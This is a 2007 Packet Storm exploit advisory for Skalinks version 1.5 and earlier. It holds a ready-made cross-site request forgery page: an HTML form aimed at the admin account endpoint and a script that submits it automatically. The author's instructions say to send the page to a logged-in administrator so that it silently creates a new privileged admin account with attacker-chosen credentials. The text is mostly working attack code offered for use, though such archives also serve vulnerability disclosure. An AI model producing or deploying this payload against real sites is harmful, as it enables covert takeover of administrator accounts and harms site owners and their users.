skalinks-csrf.txt

2007-11-05T00:00:00
ID PACKETSTORM:60677
Type packetstorm
Reporter Vincy
Modified 2007-11-05T00:00:00

Description

                                        
                                            `##########################################################################  
# _ _ _ _ _____ _ _ #  
# | | | | | | (_) |_ _| (_) | | #  
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #  
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #  
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #  
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #  
# __/ | #  
# |___/ #  
#________________________________________________________________________#  
| |  
| Site: www.hackinginside.altervista.org |  
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |  
| Author: Vincy |  
| Email: djvincy@hotmail.it |  
|________________________________________________________________________|  
  
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.  
It work only if admin's logged.  
  
-------------------------------------------------------------------------------------------  
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">  
<input type="text" name="admin_name" value="[ NOME ]">  
<input type="text" name="admin_password" value="[ PASSWORD ]">  
<input type="text" name="admin_email" value="[ EMAIL ]">  
<select name="admin_type"><option value="2">Super Editor</option></select>  
<input type=hidden name="Add_admin" value="Add Admin">  
</form>  
<script>document.add_admin.submit()</script>  
-------------------------------------------------------------------------------------------  
  
# Vincy - Hacking Inside Crew  
`